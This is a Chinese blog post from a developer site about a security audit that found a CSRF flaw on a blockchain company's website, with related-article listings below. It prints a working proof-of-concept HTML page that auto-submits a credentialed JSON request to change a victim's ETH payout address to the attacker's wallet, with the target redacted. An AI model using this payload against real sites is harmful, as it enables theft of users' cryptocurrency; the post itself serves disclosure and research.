某区块链官网存在的CSRF漏洞

最新推荐文章于 2025-07-16 14:16:21 发布
最新推荐文章于 2025-07-16 14:16:21 发布
阅读量1.7w 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全研究
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/softgmx/article/details/81354710
本文分享了一次为一家区块链公司进行安全审计的经历,发现并验证了一个跨站请求伪造(CSRF)漏洞,该漏洞允许攻击者篡改用户的打币地址。通过发布POC代码,展示了如何利用这一漏洞,并提供了深入研究的基础。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前面帮某区块链公司的官网(市值top100)做安全审计,存在很多问题,其中包括了一个价值的跨站请求伪造CSRF漏洞,可以把打币地址篡改为黑客的钱包地址,从技术来说,有一个比较有价值的点,该网站用ajax提交数据,是application/json格式,很多WEB安全工具都没扫出来(编码格式不对导致错误返回被漏报了),自己写了一个POC完美验证这个问题。下面把POC代码发出来,方面大家研究

<!DOCTYPE html>
<html>
<head>
<script src="jquery.js"></script>
<script>
   var submit = function(){
       jQuery.ajax({

             type: "post",
             url: 'https://xxxxxxxxx/*******/updateETHAddress',
             async: false, 

             xhrFields: {
                 withCredentials: true
             },

             crossDomain: true,
             data: JSON.stringify({                  
                 ethWalletAddress: "bPNin7*****************567Jn******",
             }),
             contentType: "application/json",
             dataType: "json",
             })
         window.location.href='https://xxxxxxxx/index.html';
     };
</script>
</head>
<body onload="submit()">

</body>
</html>

9.1 预防CSRF攻击
Kaitiren的专栏
02-18 228
什么是CSRF CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 那么CSRF到底能够干嘛呢?你可以这样简单的理解:攻击者可以盗用你的登陆信息,以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学的诡计,例如通过QQ等聊天软件发送的链接(有些还伪装成短域名,用户无法分辨),攻击者就能迫使Web应用的用户去执行攻击者预设的操作。例如,当用户登录网络银行去查看
新型社区时间交换App:基于区块链的技能共享平台
AI大模型应用之禅
03-10 1376
本章介绍了社区时间交换的背景和核心概念,分析了当前模式面临的问题,并引入了基于区块链技术的社区时间交换App。接下来,我们将深入探讨区块链技术的原理和应用,为构建这一新型技能共享平台提供技术基础。区块链技术作为一种革命性的技术,为社区时间交换提供了强大的技术支持。通过区块链,社区时间交换App能够实现交易的透明性、安全性和高效性,为居民提供更加可靠和便捷的服务。通过本章的描述,我们详细介绍了社区时间交换App的总体架构设计、功能模块实现以及安全性和隐私保护措施。
CSRF漏洞原理及防范策略:保护你的Web应用安全
喜欢Python编程的程序员柚柚呀
01-09 962
在数字化时代,Web应用的安全性至关重要。今天,我们将深入探讨一个常见的Web安全漏洞——CSRF(Cross-Site Request Forgery,跨站请求伪造)漏洞,并分享实用的防范策略,帮助你保护自己的Web应用免受攻击。
CSRF漏洞原理攻击与防御(超详细)
xx16755498986的博客
07-16 839
CSRF(跨站请求伪造)是一种恶意攻击方式,攻击者利用用户已登录的状态,诱导其访问恶意网站从而执行非预期的操作。攻击成功的关键在于攻击者能预测目标请求的所有参数。CSRF攻击分为GET和POST类型,其中GET类型通过构造恶意URL实现(如银行转账操作)。要防范CSRF攻击,需避免使用GET请求执行敏感操作,并采用CSRF令牌等安全措施。攻击条件包括:用户已登录受信任站点且未登出,同时访问了恶意网站。
认识区块链区块链的底层实现之密码学
weixin_42340783的博客
02-28 783
区块链起源于密码学,可以说区块链的核心,以及安全性、不可篡改性的来源很大一部分都是基于密码学实现的。密码学相信对大家来说都有接触过,但是不搞安全的同学可能没有深入学习过,密码学是网络安全、信息安全等专业的奠基学科。按照时间分类,我们可以把密码学分为古典密码学和现代密码学。古典密码学主要是通过一些移位对应、字母重排、替换字母、或者简单的其他方法进行加密的。比如a-> i, b->u 进行一个简单的加密,在现代计算机面前显然是没有任何安全性的。
记录一次完整的SRC漏洞挖掘实战
A1_3_9_7的博客
04-28 1006
一句话,柿子要挑软的捏。渗透测试思路最重要,每个人在做渗透测试时的思路都不同,有思路有想法才能进行下去。
区块链基础与网络安全
2401_88326437的博客
11-15 1282
区块链起源于比特币,它基于P2P网络技术、加密技术、时间戳技术、区块链技术等电子现金系统的构架理念,区块链是比特币的技术底层。比特币发明者是中本聪(中国人本来就聪明),手动滑稽一下哈,2008年,金融危机大背景下,比特币出现,被定义为一个点对点的电子现金系统。2009年,创世区块诞生,比特币总量为2100w个。安全问题越来越趋向于用户、平台层面,区块链的安全问题已经延伸到了传统的网络安全、基础设施、移动信息安全等问题,区块链本身、使用者以及衍生的东西都需要我们的重点关注。
Solidity 合约安全,常见漏洞 (上篇)
baimao__Ch的博客
06-25 1212
上面列出的问题是智能合约被黑的主要途径,但还有很多其他的根本原因,可以串联成重大问题,下面记录了这些问题。然而,正如传统的软件工程有常见的漏洞主题,如 SQL 注入、缓冲区超限和跨网站脚本,智能合约中也有反复出现的。尽管重入可能是最知名的智能合约漏洞,但它只占发生的黑客的一小部分。该合约有一个用心良苦的机制,以防止合约的所有者退出,直到所有付款超过荷兰拍卖价格的退款被给予。这似乎是一个简单的错误,但忘记对谁可以调用一个敏感函数(如提取以太币或改变所有权)进行限制,这种情况经常发生,令人惊讶。
【burpsuite安全练兵场-客户端16】测试WebSockets安全漏洞-3个实验(全)
baimao__Ch的博客
07-04 424
一、测试WebSockets安全漏洞1、网络套接字2、HTTP和WebSockets区别3、建立WebSocket连接4、WebSocket消息外观二、操纵WebSocket流量1、简述:2、拦截和修改WebSocket消息3、重放和生成新的WebSocket消息4、操作WebSocket连接5、WebSockets安全漏洞6、操纵WebSocket消息以利用漏洞实验1:操纵WebSocket消息以利用漏洞7、操纵WebSocket握手以利用漏洞
用dnsmasq 实现DNS劫持
热门推荐
softgmx的博客
08-31 2万+
私搭一个DNS服务器 yum install dnsmasq -y 劫持指定域名 # vi /etc/dnsmasq.conf address=/testdomain.com/10.10.254.62 #service dnsmasq restart 配置本地DNS服务器:   访问劫持的网站:   ...
深度学习自身的安全
softgmx的博客
08-28 1万+
现在AI安全早已成为安全行业的热门词汇了,AI安全包括两个层面,一个用AI解决安全安全行业问题,一个是AI自身的安全问题,平时我们谈AI解决安全安全行业问题比较多,对AI自身安全确少有提及,今天要分享的就是AI自身安全问题,总结了一些前沿的论文,方便大家一目了然。 机器学习(深度学习)的分层实现:   主流的深度机器学习平台的复杂度: 存在的攻击面: 输入畸形数据 输入被毒化的...
linux本地内核提权漏洞 Dirty COW 成因分析
softgmx的博客
03-31 1万+
关于“Dirty COW" 的影响,这方面的文章网上写的太多了,但是关于此漏洞真实成因的文章却很缺乏,基于此,我写了这篇文章,希望对想深入研究的人一些帮助。脏牛漏洞核心成因: 基于下面的POC来讲,要篡改的特权文件在被只读映射后,攻击者第一次发起wite=&gt;mem_write=&gt;get_user_pages=&gt;faultin_page调用后已经去掉了...
分析如何通过暴破方式bypass ASLR
softgmx的博客
08-30 1万+
名词说明: No-eXecutable bit (NX), address space layout randomization (ASLR) and stack smashing protector (SSP) 实现环境 本案例在我的centos 64位(内核版本3.1)同时bypass NX、ASLR、SSP保护 漏洞利用的分析过程 //通过暴力破解,拿到漏洞的偏移量、SSP的c...
UFO 提权漏洞分析
softgmx的博客
08-31 1万+
POC: https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c 内核commit 的patch https://github.com/torvalds/linux/commit/85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa Includes KASL...
弱点扫描之openvas
softgmx的博客
09-01 1万+
更新KALI apt-get update apt-get dist-upgrade   安装openvas包 apt-get install openvas   本地安装包括库更新 openvas-setup   检查一下是否安装正确 openvas-check-setup   添加管理员 openvasmd --create-user=admin --role=Ad...
嵌入式+基于STM32+卫星GPS路径记录仪+附完整源代码
最新发布
08-20
嵌入式+基于STM32+卫星GPS路径记录仪+附完整源代码
计算机视觉学科基础课程作业任务
08-20
资源下载链接为: https://pan.quark.cn/s/149fecb33b85 计算机视觉学科基础课程作业任务(最新、最全版本!打开链接下载即可用!)
【Python毕设】5p118基于python的高校实验室管理系统0_django.zip
08-20
项目资源包含:可运行源码+sql文件+; python3.8+Django+mysql5.7+vue 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
Web安全核心:用户与资产数据威胁评估指南
文档中可能涵盖了各种安全威胁类型,如网络钓鱼、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、SQL注入等,并提供了相应的评估和防御策略。文档还可能详细描述了如何识别安全漏洞,以及如何通过定期的安全扫描和渗透...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值